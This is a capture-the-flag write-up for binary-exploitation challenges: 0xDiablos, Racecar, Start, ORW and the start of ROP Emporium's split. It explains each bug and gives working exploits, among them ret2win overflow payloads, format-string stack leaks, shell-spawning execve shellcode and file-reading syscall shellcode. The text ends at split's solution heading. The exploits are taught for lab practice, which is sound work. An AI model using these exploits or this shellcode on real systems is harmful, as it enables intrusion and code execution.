
List of Contents

Note: the Case Identification section is about finding the bug, i.e. which part of the program is vulnerable, while the Solution section explains how to exploit the program based on the vulnerability found in the Case Identification section.

HackTheBox

You know 0xDiablos

Keyword: Buffer Overflow, ret2win

Challenge URL: https://app.hackthebox.com/challenges/You%2520know%25200xDiablos

Case Identification

Let's check the binary information and its protections using checksec:

    Arch:     i386-32-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x8048000)
    Stack:    Executable
    RWX:      Has RWX segments

It seems that all of the binary's security protections are disabled. Since there is no stack canary and PIE is disabled (so function addresses are fixed), we can simply overflow the buffer and use a basic ret2win technique.

First of all, we need to find the offset from the start of the buffer to the point where the overflow takes control. Let's set a breakpoint on the main function and send an input long enough to overflow the program. I used the cyclic 300 command from pwndbg to generate the payload, and here is what I got when debugging with pwndbg.

[Image: pwndbg output after sending the cyclic 300 pattern]

Based on the output above, the instruction pointer (EIP) no longer holds a valid code address. Instead, it holds four bytes of our input payload. EIP stores the memory address of the next instruction the processor will execute, so if we control EIP, we can redirect the program flow arbitrarily.
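The crash value can be mapped back to an offset because cyclic produces a de Bruijn sequence. Every 4-byte window in the pattern is unique, so the 4 bytes that end up in EIP identify exactly one position.

The sketch below is a small pure-Python re-implementation for illustration only. It assumes the default lowercase alphabet and 4-byte windows. In practice, pwntools' cyclic_find (or cyclic -l on the command line) does this lookup for you.

```python
import itertools
import string
import struct

ALPHABET = string.ascii_lowercase.encode()  # assumed default cyclic alphabet


def de_bruijn(alphabet: bytes = ALPHABET, n: int = 4):
    """Yield a de Bruijn sequence B(k, n): every n-byte window appears exactly once."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def cyclic(length: int) -> bytes:
    """First `length` bytes of the pattern, e.g. cyclic(300) for the crash input."""
    return bytes(itertools.islice(de_bruijn(), length))


def cyclic_find(window: bytes, search_len: int = 4096) -> int:
    """Offset of a 4-byte window inside the pattern (-1 if absent)."""
    return cyclic(search_len).find(window)


# EIP held 0x62616177 at the crash; on little-endian i386 those are the bytes b"waab".
eip = 0x62616177
print(cyclic(12))                           # b'aaaabaaacaaa'
print(cyclic_find(struct.pack("<I", eip)))  # 188
```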

Since EIP holds the string waab, or 0x62616177 in hex (the bytes read in little-endian order), we can replace this value with another memory address, such as the address of the function that prints the flag. There are 3 user-defined functions in this program:

0x080491e2  flag
0x08049272  vuln
0x080492b1  main

Our goal is to get the flag from the flag function, which is never called anywhere in the code. But before we go deeper, let's analyze the disassembly of the main function to understand the program flow. Here is the snippet:

    0x0804930b <main+90> :	call   0x8049070 <puts@plt>
    0x08049310 <main+95> :	add    esp,0x10
==> 0x08049313 <main+98> :	call   0x8049272 <vuln>
    0x08049318 <main+103>:	mov    eax,0x0
    0x0804931d <main+108>:	lea    esp,[ebp-0x8]

At main+98, the program calls the vuln function before executing the next instruction. Let's step into that function to analyze it further.

    0x0804928a <+24>:	lea    eax,[ebp-0xb8]
    0x08049290 <+30>:	push   eax
==> 0x08049291 <+31>:	call   0x8049040 <gets@plt>
    0x08049296 <+36>:	add    esp,0x10
    0x08049299 <+39>:	sub    esp,0xc
    0x0804929c <+42>:	lea    eax,[ebp-0xb8]
    0x080492a2 <+48>:	push   eax
==> 0x080492a3 <+49>:	call   0x8049070 <puts@plt>
    0x080492a8 <+54>:	add    esp,0x10
    0x080492ab <+57>:	nop
    0x080492ac <+58>:	mov    ebx,DWORD PTR [ebp-0x4]
    0x080492af <+61>:	leave  
    0x080492b0 <+62>:	ret    

We found something interesting here. The function passes a buffer at ebp-0xb8 to gets, which reads user input until a newline without any bounds checking. As a result, gets keeps storing characters past the end of the buffer. That is why gets is dangerous: it makes the program vulnerable to a buffer overflow attack.

In addition, the function calls puts on the same buffer, which echoes our input back to us.

Solution

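Since we know that the gets function is vulnerable, we can start exploiting the program. Based on our first findings about EIP, the saved return address is overwritten once the input is longer than 188 characters. This matches the 0xb8 (184) bytes from the start of the buffer up to the saved ebp, plus the 4-byte saved ebp itself. This is confirmed by the image below.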

[Image: EIP overwritten after 188 characters]

The next 4 bytes, at offsets 188 to 191 of the payload (the 189th to 192nd characters), overwrite the saved return address and end up in EIP when vuln returns. We can set these 4 bytes to any address we want EIP to jump to, so we replace them with the starting address of the flag function, 0x080491e2.

Don't forget about the byte ordering of this binary. It is little-endian (least significant byte first), so the address must be written in reverse byte order: \xe2\x91\x04\x08. Now let's try our first test payload. I used pwntools for this. Here is the snippet:

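from pwn import *

context.arch = 'i386'
p = process('./vuln')
# init-pwndbg: gdb command from this setup that loads pwndbg; break on vuln's leave
gdb.attach(p, '''
    init-pwndbg
    break *0x080492af
    continue
''')
# 188 filler bytes, then flag() at 0x080491e2 in little-endian (same as p32(0x080491e2))
payload = b'a'*188 + b'\xe2\x91\x04\x08'
p.sendlineafter(b'0xDiablos:', payload)
p.interactive()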

Set a breakpoint at 0x080492af (the leave instruction at vuln+61) so we can inspect the registers and the stack right before vuln executes its ret instruction.

[Image: registers and stack at the breakpoint on 0x080492af]

Good. If you look closely at the image above, there is a small downward arrow from vuln+62 to the flag address. This means our payload has successfully overwritten the return address, so vuln returns into the flag function. But even though we can reach the flag function, there is another problem: it contains 2 comparisons, as shown in the image below.

[Image: the two comparisons inside the flag function]

Both comparisons need to pass (the branches effectively act as a logical AND), so you must satisfy all the conditions to get the flag. The first comparison (0x08049246) checks the first argument against 0xdeadbeef, while the second (0x0804924f) checks the second argument against 0xc0ded00d. If you are still not sure what's going on, make sure you understand the program flow shown in the image above.

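Before building the final exploit, remember how flag locates its arguments. We enter flag through vuln's ret instead of a call instruction, so nothing pushes a return address for flag. After flag's prologue (push ebp; mov ebp, esp), the 4 bytes right after the flag address in our payload are treated as flag's return address. The two arguments are then read from [ebp+0x8] and [ebp+0xc], i.e. 8 and 12 bytes after the start of the flag address. So we need 4 bytes of padding between the flag address and the arguments. You can check this article for more details.

Now let's build the final exploit to pass those conditions. Based on our findings so far, the final exploit consists of:

  • 188 filler bytes to reach the saved return address
  • the address of the flag function
  • 4 bytes of padding (a fake return address for flag)
  • the 2 arguments that pass the branch conditions, 0xdeadbeef and 0xc0ded00d, packed little-endian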
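The payload layout can be sanity-checked in plain Python before sending anything. This sketch makes the following assumptions:

  • flag starts with the usual push ebp; mov ebp, esp prologue.
  • flag reads its arguments from the standard cdecl slots [ebp+0x8] and [ebp+0xc].

It walks esp through the ret into flag to find where those slots land in the payload. p32 is re-implemented with struct, so the snippet runs without pwntools.

```python
import struct

BUF_OFFSET = 0xb8             # vuln's buffer starts at ebp-0xb8 (lea eax,[ebp-0xb8])
RET_OFFSET = BUF_OFFSET + 4   # skip the 4-byte saved ebp at [ebp] -> 188
FLAG_ADDR = 0x080491e2        # flag() from the symbol list
ARG1, ARG2 = 0xdeadbeef, 0xc0ded00d


def p32(value: int) -> bytes:
    """Pack a 32-bit value little-endian (same bytes as pwntools' p32)."""
    return struct.pack("<I", value)


def flag_arg_offsets(ret_slot: int):
    """Payload offsets that flag() reads as [ebp+0x8] and [ebp+0xc].

    Assumes flag() begins with `push ebp; mov ebp, esp`.
    """
    esp = ret_slot + 4   # vuln's `ret` pops the flag address
    esp -= 4             # flag: push ebp (reuses the slot that held the address)
    ebp = esp            # flag: mov ebp, esp
    return ebp + 0x8, ebp + 0xc


def build_payload() -> bytes:
    arg1_off, arg2_off = flag_arg_offsets(RET_OFFSET)
    payload = b"A" * RET_OFFSET + p32(FLAG_ADDR)
    payload += b"B" * (arg1_off - len(payload))  # fake return address for flag()
    payload += p32(ARG1)
    assert len(payload) == arg2_off
    payload += p32(ARG2)
    return payload


payload = build_payload()
print(RET_OFFSET, flag_arg_offsets(RET_OFFSET), len(payload))  # 188 (196, 200) 204
```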

solver

Running the solver script gives us the flag. Here is the final script I used to solve this challenge.


Racecar

Keyword: Format String Vulnerability

Challenge URL: https://app.hackthebox.com/challenges/racecar

Case Identification

This challenge gives us an executable file with all security protections enabled. There are many user-defined functions in the disassembled code, but some of them just print the menu or a text message, which is not very useful for solving the challenge.

[Image: user-defined functions in the disassembled code]

We just need to focus on car_menu, because that is where user input occurs. Based on the disassembled car_menu function, if the user wins the race, the program prompts the user to enter a message. It also opens a file named "flag.txt" and reads its contents into a local buffer.

So our main goal is to reach that prompt so we can send our payload there. But how can we even win the race if the outcome is determined by random numbers?

if (((iVar1 == 1) && (iVar2 < iVar3)) || ((iVar1 == 2 && (iVar3 < iVar2)))) {
    printf("%s\n\n[+] You won the race!! You get 100 coins!\n",&DAT_00011540);
    coins = coins + 100;
    puVar5 = &DAT_00011538;
    printf("[+] Current coins: [%d]%s\n",coins,&DAT_00011538);
    printf("\n[!] Do you have anything to say to the press after your big victory?\n> %s",
            &DAT_000119de);
    __format = (char *)malloc(0x171);
    __stream = fopen("flag.txt","r");
    if (__stream == (FILE *)0x0) {
        printf("%s[-] Could not open flag.txt. Please contact the creator.\n",&DAT_00011548,puVar5);
                    /* WARNING: Subroutine does not return */
        exit(0x69);
    }
    fgets(local_3c,0x2c,__stream);
    read(0,__format,0x170);
    puts(
        "\n\x1b[3mThe Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: \x1b[0m"
        );
    printf(__format);
}
else if (((iVar1 == 1) && (iVar3 < iVar2)) || ((iVar1 == 2 && (iVar2 < iVar3)))) {
    printf("%s\n\n[-] You lost the race and all your coins!\n",&DAT_00011548);
    coins = 0;
    printf("[+] Current coins: [%d]%s\n",0,&DAT_00011538);
}

The program determines the winner based on randomly generated numbers, but we can actually increase our chance to win the game. Here is how it works:

  1. When you choose car option 1 and select the circuit race (option 2), the relevant code block is executed:
    if (((iVar1 == 1) && (iVar2 == 2)) || ((iVar1 == 2 && (iVar2 == 2)))) {
        iVar2 = rand();
        iVar2 = iVar2 % 10;
        iVar3 = rand();
        iVar3 = iVar3 % 100;
    }
    • In this case, iVar2 (your car number) is generated using rand() % 10, which results in a number between 0 and 9. On the other hand, iVar3 (the opponent's car number) is generated using rand() % 100, which results in a number between 0 and 99.
    • Since your car number (iVar2) is always less than 10 and the opponent's car number (iVar3) is between 0 and 99, the condition iVar2 < iVar3 is highly likely to be satisfied, resulting in winning the race.
  2. When you choose car 2 and select the highway battle (option 1), the relevant code block is executed:
     else if (((iVar1 == 1) && (iVar2 == 1)) || ((iVar1 == 2 && (iVar2 == 1)))) {
         iVar2 = rand();
         iVar2 = iVar2 % 100;
         iVar3 = rand();
         iVar3 = iVar3 % 10;
     }
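    • In this case, iVar2 (your car number) is generated using rand() % 100, which results in a number between 0 and 99. On the other hand, iVar3 (the opponent's car number) is generated using rand() % 10, which results in a number between 0 and 9.
    • Car 2 wins when iVar3 < iVar2. Since the opponent's number is always less than 10 while yours ranges from 0 to 99, this condition is also highly likely to be satisfied.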

To summarize, we can win the race if we choose either car 1 with the circuit race (option 2) or car 2 with the highway battle (option 1). Great, now we can reliably reach the user input. It's time to figure out how to leverage this input to exploit the program.
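The win chance can be computed exactly rather than described as "highly likely". The sketch below enumerates every pair of values. It assumes rand() % m is uniformly distributed over 0..m-1, ignoring the slight modulo bias of rand(). win_probability is a hypothetical helper, not part of the binary.

```python
from fractions import Fraction


def win_probability(my_mod: int, opp_mod: int, need_mine_lower: bool) -> Fraction:
    """Exact chance of winning, assuming rand() % m is uniform over 0..m-1.

    need_mine_lower=True  -> car 1: wins when iVar2 < iVar3
    need_mine_lower=False -> car 2: wins when iVar3 < iVar2
    """
    wins = 0
    for mine in range(my_mod):          # iVar2 = rand() % my_mod
        for theirs in range(opp_mod):   # iVar3 = rand() % opp_mod
            won = mine < theirs if need_mine_lower else theirs < mine
            if won:
                wins += 1
    return Fraction(wins, my_mod * opp_mod)


print(win_probability(10, 100, need_mine_lower=True))    # car 1 + circuit -> 189/200
print(win_probability(100, 10, need_mine_lower=False))   # car 2 + highway -> 189/200
print(win_probability(100, 10, need_mine_lower=True))    # car 1 + highway -> 9/200
```

189/200 is 94.5%, so the two favourable combinations win almost every time. A losing run can simply be retried.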

Solution

The main vulnerability in this program is a format string vulnerability. It occurs in the car_menu function after you win the race. Here's the relevant code:

__format = (char *)malloc(0x171);
__stream = fopen("flag.txt","r");
if (__stream == (FILE *)0x0) {
  printf("%s[-] Could not open flag.txt. Please contact the creator.\n",&DAT_00011548,puVar5);
  exit(0x69);
}
fgets(local_3c,0x2c,__stream);
read(0,__format,0x170);
puts("\n\x1b[3mThe Man, the Myth, the Legend! The grand winner of the race wants the whole world to know this: \x1b[0m");
printf(__format);

The vulnerability lies in the last line: printf(__format). Here, the program passes user input (__format) directly to printf as the format string, instead of using something like printf("%s", __format). This allows an attacker to use format specifiers to read or write memory. Using %x or %p specifiers, you can leak values from the stack. Now the question is, what needs to be leaked?

In the car_menu function, we see this code:

char local_3c [44];
...
fgets(local_3c,0x2c,__stream);

local_3c is a local array of 44 bytes declared within the function, so it lives in car_menu's stack frame. fgets reads up to 43 bytes (0x2c minus one, leaving room for the null terminator) from the flag file into this array. The flag therefore sits on the stack, and we can leak it by sending multiple %p specifiers.

The stack layout of the car_menu function would look something like this:

[Image: stack layout of car_menu]

The stack grows downward, toward lower addresses: when a function is called, new data is pushed onto the stack at lower addresses. printf expects one argument for each format specifier in the format string. If there aren't enough arguments, printf still reads a value from the stack slot where the next argument would be, for every specifier.

When you call printf(user_input) instead of printf("%s", user_input), you're allowing the user to control the format string. This means the user can include format specifiers that printf will try to interpret.

[Image: printf reading stack values for each format specifier]

printf starts reading from where it expects the first argument to be, which on 32-bit x86 is the stack slot right after the __format pointer passed to it. Since we're not providing real arguments to match the format specifiers, printf keeps reading further along the stack (that's why the chall name is racecar :').

Each %p makes printf read the next 4 bytes (one 32-bit word) and move on to the following word. Since local_3c (containing the flag) is a local variable, it lies in car_menu's stack frame, making it reachable this way. This continues for as many %p specifiers as you provide, potentially reading through the entire stack frame.

The key point is that each %p advances the read position by 4 bytes, toward higher addresses. So if your input is %p %p %p %p %p %p, you might see output like: 0x62ab0200 0x170 0x60e76dfa 0x2d 0x7 0x26. You can create a local fake flag.txt containing AAAABBBB so the flag is easier to spot. It shows up as 0x41414141 0x42424242.

[Image: leaking the fake flag with %p]
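Reading the flag out of the %p dump by hand is tedious, so here is a small decoding sketch. It makes these assumptions:

  • the process is 32-bit, so each %p prints one 4-byte little-endian word;
  • the flag uses the HTB{...} format.

The helper names are hypothetical, and the sample leak in the example is made up.

```python
import struct

FORMAT_MAX = 0x170  # read(0, __format, 0x170)


def make_leak_payload(count: int) -> bytes:
    """'%p %p ...' with `count` specifiers, kept within the 0x170-byte read."""
    payload = b" ".join([b"%p"] * count)
    if len(payload) > FORMAT_MAX:
        raise ValueError("too many specifiers for the 0x170-byte read")
    return payload


def words_to_bytes(leak: str) -> bytes:
    """Convert printf's %p output back into raw little-endian bytes."""
    raw = b""
    for token in leak.split():
        if token == "(nil)":          # glibc prints NULL pointers as (nil)
            value = 0
        elif token.startswith("0x"):
            value = int(token, 16)
        else:
            continue                  # skip any other text in the output
        raw += struct.pack("<I", value & 0xFFFFFFFF)
    return raw


def extract_flag(raw: bytes, prefix: bytes = b"HTB{") -> bytes:
    """Return prefix...'}' from the recovered bytes, or b'' if it is not there."""
    start = raw.find(prefix)
    if start == -1:
        return b""
    end = raw.find(b"}", start)
    return raw[start:end + 1] if end != -1 else b""


leak = "0x62ab0200 0x170 (nil) 0x7b425448 0x656b6166 0x7d"  # made-up sample output
print(extract_flag(words_to_bytes(leak)))  # b'HTB{fake}'
```

Each "%p " costs 3 bytes, so at most 123 specifiers fit in the 0x170-byte read.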

Here is the solver script I used to implement this solution and solve the challenge.


Pwnable

Start

Keyword: System Call, Shellcode

Challenge URL: https://pwnable.tw/challenge/#1

Case Identification

When you disassemble the binary file, you'll notice that it doesn't have the main function that C programs normally have.

Non-debugging symbols:
0x08048060  _start
0x0804809d  _exit
0x080490a3  __bss_start
0x080490a3  _edata
0x080490a4  _end

In a standard C program, _start is provided by the C runtime and it sets up the environment before calling main. When there is no main symbol in the program, _start becomes the direct entry point for the operating system. It's common to use _start as the entry point when writing pure assembly.

So let's start by analyzing the _start symbol.

[Image: disassembly of _start]

Here is how some registers are used to make syscalls in this challenge (32-bit x86 Linux):

  1. al (lower 8 bits of eax): stores the syscall number. On 32-bit Linux, 4 is write and 3 is read.
  2. bl (lower 8 bits of ebx): stores the file descriptor: 0 for stdin and 1 for stdout.
  3. ecx: pointer to the buffer (set with mov ecx, esp, so the buffer is on the stack).
  4. dl (lower 8 bits of edx): length of the buffer in bytes.

If you are still confused about those registers, make sure you have read the following repository for more explanation.

Based on the image above, the program pushes the string "Let's start the CTF:" (20 bytes) onto the stack in reverse order, then writes those 20 bytes to stdout. After writing this string, the program doesn't adjust the stack pointer (there's no add esp, X instruction before the read).

The read syscall then starts writing data to the stack at the same position where the original string was stored. This means that any input beyond 20 bytes will start overwriting the stack frame.

Solution

The vulnerability occurs because the read syscall accepts up to 60 bytes, but the available buffer space is only 20 bytes. Any input beyond 20 bytes overwrites the saved return address, which gives us control of the EIP register. Since there is no function that reads or prints the flag, our main goal is to spawn an interactive shell with our own shellcode.

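from pwn import *

context.arch = 'i386'
p = process('./start')  # local binary name assumed

# 1st payload: 20 filler bytes, then return to `mov ecx, esp` (0x08048087)
p.recvuntil(b"CTF:")
payload = b"A"*20
payload += p32(0x08048087)
p.send(payload)

esp = u32(p.recvn(20)[:4])  # the first 4 leaked bytes are a stack address
info("Leaked Address: " + hex(esp))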

The first payload leaks a stack address. When _start returns, it jumps to the mov ecx, esp instruction at 0x08048087. Since execution goes back into the write syscall, the program writes 20 bytes starting at the current ESP to stdout. The first 4 of those bytes are the stack address saved by the push esp at the very beginning of _start.

In short, the first payload allows the exploit to determine the current stack address which is essential for accurately placing the shellcode in the next stage. This leaked address is then used to calculate where to place the actual shellcode. It ensures that the second payload can accurately jump to the shellcode.

# 2nd payload
shellcode = asm(
    """
    xor ecx, ecx
    mul ecx
    push ecx
    push 0x68732f2f
    push 0x6e69622f
    mov ebx, esp
    mov al, 11
    int 0x80
    """
)

payload = b"A"*20
payload += p32(esp+20)  # return into the shellcode placed right after this address
payload += shellcode
p.send(payload)
p.interactive()

For the second payload, we again need 20 filler bytes to reach the return address. But instead of returning to the original address, we return to esp+20, which points to the beginning of the shellcode, right after the 20 filler bytes and the 4-byte overwritten return address.
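Where esp+20 comes from can be checked by following esp through _start. This sketch assumes _start consists of the following steps:

  • push esp;
  • a push of the _exit address;
  • five pushes for the 20-byte string;
  • the write and read syscalls, both using mov ecx, esp;
  • add esp, 0x14 and ret.

The entry address in the example is hypothetical, since ASLR changes it on every run.

```python
def start_stack_walk(entry_esp: int) -> dict:
    """Follow esp through _start for both stages (assumed instruction sequence)."""
    esp = entry_esp
    esp -= 4                 # push esp   -> saved copy of entry_esp (what we leak)
    saved_copy = esp
    esp -= 4                 # push _exit -> return address overwritten by stage 1
    esp -= 20                # five pushes of "Let's start the CTF:"
    read1 = esp              # mov ecx, esp; write 20 bytes; read up to 60 bytes here
    esp += 0x14              # add esp, 0x14
    esp += 4                 # ret -> 0x08048087 (stage 1 return address)
    read2 = esp              # mov ecx, esp: write leaks [read2], then read refills it
    esp += 0x14              # add esp, 0x14
    ret2 = esp               # stage 2's p32(...) overwrites this slot
    return {
        "leaked": entry_esp,   # value stored at saved_copy, which equals read2
        "read1": read1,
        "read2": read2,
        "saved_copy": saved_copy,
        "ret2": ret2,
        "shellcode": ret2 + 4, # shellcode follows the 4-byte return address
    }


walk = start_stack_walk(0xffffd0f0)        # hypothetical entry esp
print(walk["shellcode"] - walk["leaked"])  # 20
```

The second read starts 4 bytes below the leaked value. Adding 20 filler bytes and the 4-byte return address therefore lands the shellcode exactly 20 bytes above the leaked address.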

Why do we need to return to esp+20?

  • esp is the leaked stack address from the first stage.
  • The second read writes its input starting at esp-4, the slot that held the leaked value.
  • 20 filler bytes plus the 4-byte return address take the payload from esp-4 to esp+20, so the shellcode begins exactly at esp+20.

The 20 in esp+20 is crucial. It equals the buffer size plus the return address size (24 bytes), minus the 4 bytes by which the second write starts below the leaked address, so the jump lands on the first byte of the shellcode. Here is the final script to solve the challenge.


ORW

Keyword: System Call, Shellcode

Challenge URL: https://pwnable.tw/challenge/#2

Case Identification

The goal of this challenge is to read the flag file located at /home/orw/flag on the server, with restrictions on which system calls can be used. Only three syscalls are allowed: open, read, and write.

Let's examine the disassembled main function of the binary. Here is the full disassembled main, and here is the snippet:

0x08048566 <+30>:	call   0x8048380 <printf@plt>
0x0804856b <+35>:	add    esp,0x10
0x0804856e <+38>:	sub    esp,0x4
0x08048571 <+41>:	push   0xc8
0x08048576 <+46>:	push   0x804a060
0x0804857b <+51>:	push   0x0
0x0804857d <+53>:	call   0x8048370 <read@plt>
0x08048582 <+58>:	add    esp,0x10
0x08048585 <+61>:	mov    eax,0x804a060
0x0804858a <+66>:	call   eax
0x0804858c <+68>:	mov    eax,0x0
0x08048591 <+73>:	mov    ecx,DWORD PTR [ebp-0x4]
0x08048594 <+76>:	leave  
0x08048595 <+77>:	lea    esp,[ecx-0x4]
0x08048598 <+80>:	ret    
  • First, those instructions set up and call the read function.
  • 0xc8 (200 in decimal) is pushed onto the stack, which is the maximum number of bytes to read.
  • 0x804a060 is pushed onto the stack. This is the address of the buffer where the input will be stored.
  • 0x0 (file descriptor for stdin) is pushed onto the stack.
  • The read function is then called, which reads up to 200 bytes from stdin into the buffer at 0x804a060.
0x08048585 <+61>:	mov    eax,0x804a060
0x0804858a <+66>:	call   eax

The key vulnerability is the call eax instruction at 0x0804858a. It executes whatever code is in the buffer at 0x804a060, which was just filled with user input. In other words, the program reads our input and executes it directly as code.

Solution

Tap here for the solver script.

Since our input is executed directly as code, we just need to chain the open, read, and write syscalls to get the flag. Let's start with the open syscall in x86 assembly.

xor eax, eax
push eax
add eax, 5
push 0x67616C66
push 0x2f77726f
push 0x2f656d6f
push 0x682f2f2f
mov ebx, esp
mov edx, 0
mov ecx, 0
int 0x80

On 32-bit x86 Linux, the open syscall is used to open a file or create a new one. It reads the pathname from where ebx points (we set ebx to the start of our string on the stack) and keeps reading until it hits the null terminator. You can refer to this article for more detail. The C equivalent of the open syscall is:

int open(const char *pathname, int flags, mode_t mode)

In assembly, you set up the syscall like this:

  • eax: Syscall number (5 for open)
  • ebx: Pointer to the null-terminated string of the pathname
  • ecx: Flags (e.g., O_RDONLY, O_WRONLY, O_RDWR)
  • edx: Mode (permissions, only used when creating a new file)

Actually, I was stuck for hours on the open syscall. At first I thought that the first three instructions of the payload were equivalent to mov eax, 5, so I replaced them with mov eax, 5. Both ways store 5 in the eax register, but the replacement is wrong.

xor eax, eax is the preferred way to zero a register because it doesn't introduce null bytes. mov eax, 5, by contrast, assembles to \xb8\x05\x00\x00\x00, which contains null bytes. In shellcode in general, we often avoid null bytes (0x00) because they can cut a payload short when it passes through string functions such as strcpy. Here our input is taken with read, which does not stop at null bytes (later instructions such as mov eax, 3 contain them too). So the decisive problem is that the replacement also drops the push eax that follows.

Null terminator is a byte with the value 0 that marks the end of a string. It tells the system "the string ends here". When you pass a string to a syscall, it needs to know where the string ends. It keeps reading memory until it hits a null byte.

The push eax after xor eax, eax is crucial. It pushes the value in eax (which is 0) onto the stack, which serves as the null terminator for the filename string that will be constructed next.

Imagine if we didn't have the null terminator: the open syscall would keep reading past the end of our string and try to open a file with a longer, incorrect name, leading to errors or unexpected behavior. The push eax (with eax equal to 0) terminates the name of the file we're going to open.

[Image: stack layout of the pushed filename]

Stack operations (push) and register operations (add eax, 5) are independent. The add eax, 5 instruction is part of the syscall setup, not of the filename construction. The stack grows downward, toward lower addresses, so the last item pushed sits at the lowest address, which is where esp (and therefore ebx) points. Pushing the 4-byte chunks in reverse order therefore produces the correct string when it is read from low to high addresses. Remember that the binary is little-endian (least significant byte first), so the bytes within each pushed value are reversed as well.
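The push constants do not have to be worked out by hand. This sketch uses a hypothetical helper, push_dwords, which:

  • pads the path with leading slashes to a multiple of 4 bytes (relying on Linux treating repeated slashes like a single one);
  • splits it into 4-byte chunks and reads each chunk as a little-endian integer;
  • returns the values in push order, last chunk first.

The null terminator still has to come from a separate push of zero, like the push eax above.

```python
import struct


def push_dwords(path: str) -> list:
    """Push immediates (in push order) that build `path` on the stack.

    Left-pads with '/' to a multiple of 4 bytes; the terminating null is
    expected to come from a separate `push` of a zeroed register.
    """
    data = path.encode()
    data = b"/" * (-len(data) % 4) + data
    chunks = [data[i:i + 4] for i in range(0, len(data), 4)]
    # The stack grows downward, so the last chunk must be pushed first.
    return [struct.unpack("<I", chunk)[0] for chunk in reversed(chunks)]


for imm in push_dwords("/home/orw/flag"):
    print(f"push {imm:#010x}")
# push 0x67616c66
# push 0x2f77726f
# push 0x2f656d6f
# push 0x682f2f2f
```

The same helper reproduces the /bin//sh constants used in the Start shellcode: push_dwords("/bin//sh") gives 0x68732f2f and then 0x6e69622f.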

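/* Read Syscall */
mov ecx, ebx      /* reuse the filename area on the stack as the read buffer */
mov ebx, eax      /* fd returned by open (eax still holds it at this point) */
mov eax, 3        /* syscall number for read */
mov edx, 38       /* read up to 38 bytes */
int 0x80

/* Write Syscall */
mov eax, 4        /* syscall number for write */
mov ebx, 1        /* fd 1 = stdout; ecx and edx are reused from read */
int 0x80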

The next syscalls are read and write. They are much more readable than the previous one. The key point of both syscalls is the file descriptor. You might be wondering:

Why is the fd set to 3 instead of 0? I thought the read syscall was about reading input, so I would use 0 for stdin. But why is it 3?

The reason is related to how file descriptors are assigned in Unix-like systems:

  • 0 is reserved for stdin (standard input)
  • 1 is reserved for stdout (standard output)
  • 2 is reserved for stderr (standard error)

When you open a new file with the open syscall, the kernel assigns the lowest available file descriptor number. Since 0, 1, and 2 are already taken, the first file a process opens typically gets 3, and subsequent files get the next available numbers.

We use 3 because we want to read from the file we just opened, not from stdin. If we used 0, we'd be reading from stdin (keyboard input) instead of our flag file. In our exploit, we're specifically trying to read the contents of the flag file we just opened, not standard input. That's why we use the file descriptor returned by open (which is 3) instead of 0.
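The lowest-available-descriptor rule is easy to observe from user space. This sketch uses Python's os.open and os.close, which wrap the open and close syscalls, on os.devnull. After closing the first descriptor, the next open gets the same number back. The exact numbers depend on what the process already has open, so the example only checks the relationship between them.

```python
import os


def lowest_free_fd_demo(path: str = os.devnull):
    """open() returns the lowest descriptor number not currently in use."""
    first = os.open(path, os.O_RDONLY)
    second = os.open(path, os.O_RDONLY)
    os.close(first)                      # free the lower number again
    third = os.open(path, os.O_RDONLY)   # expected to reuse `first`
    os.close(second)
    os.close(third)
    return first, second, third


first, second, third = lowest_free_fd_demo()
print(first == third, second > first)  # True True
```

In a process that only has 0, 1, and 2 open, such as the ORW binary when the shellcode runs, first and third would both be 3.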

Here is the solver script I used to complete this challenge.


Rop Emporium

split (x86_64 architecture)

Keyword: Buffer Overflow, Return Oriented Programming

Challenge URL: https://ropemporium.com/challenge/split.html

Case Identification

A simple Return-Oriented Programming challenge that requires us to exploit a buffer overflow vulnerability to execute a specific command that reads the flag. Here is the information about the file:

[Image: binary information of split]

There are 3 user-defined functions in the binary file: main, pwnme, and usefulFunction. The vulnerable part is in the pwnme() function, especially in this line: read(0,local_28,0x60). Here is the disassembled code of pwnme function:

void pwnme(void)
{
  undefined local_28 [32];
  
  memset(local_28,0,0x20);
  puts("Contriving a reason to ask user for data...");
  printf("> ");
  read(0,local_28,0x60);
  puts("Thank you!");
  return;
}

The buffer local_28 can only hold 32 bytes safely, but the read() function is allowed to write up to 96 bytes into this buffer. This means we can write 64 bytes more than the buffer can safely hold. The first 32 bytes fill the buffer as intended. The next 64 bytes will overflow the buffer and write into adjacent memory.

So our idea is to craft an input longer than 32 bytes whose extra bytes overwrite the saved return address and change where the program goes next.
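Before building the chain, it helps to know how much room the overflow gives us. This sketch assumes the usual x86_64 frame, with the 32-byte buffer directly below the 8-byte saved rbp. That is consistent with Ghidra naming it local_28, i.e. 0x28 bytes below the return address.

The sketch computes two things: the offset of the saved return address, and how many 8-byte chain entries still fit in the 0x60-byte read. build_rop_payload is a hypothetical helper, and the values in the example are placeholders, not real gadget addresses from the binary.

```python
import struct

BUF_SIZE = 0x20   # undefined local_28[32]
SAVED_RBP = 8     # saved frame pointer sits just above the buffer (assumed)
READ_MAX = 0x60   # read(0, local_28, 0x60)

RET_OFFSET = BUF_SIZE + SAVED_RBP    # filler bytes before the saved return address
CHAIN_ROOM = READ_MAX - RET_OFFSET   # bytes left for the ROP chain
CHAIN_QWORDS = CHAIN_ROOM // 8       # 8-byte slots available


def build_rop_payload(chain) -> bytes:
    """Filler up to the saved return address, then 64-bit entries packed little-endian."""
    payload = b"A" * RET_OFFSET + b"".join(struct.pack("<Q", q) for q in chain)
    if len(payload) > READ_MAX:
        raise ValueError(f"chain too long: {len(payload)} > {READ_MAX} bytes")
    return payload


print(RET_OFFSET, CHAIN_ROOM, CHAIN_QWORDS)  # 40 56 7
placeholder_chain = [0x4141414141414141, 0x4242424242424242]  # not real addresses
print(len(build_rop_payload(placeholder_chain)))  # 56
```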

Solution
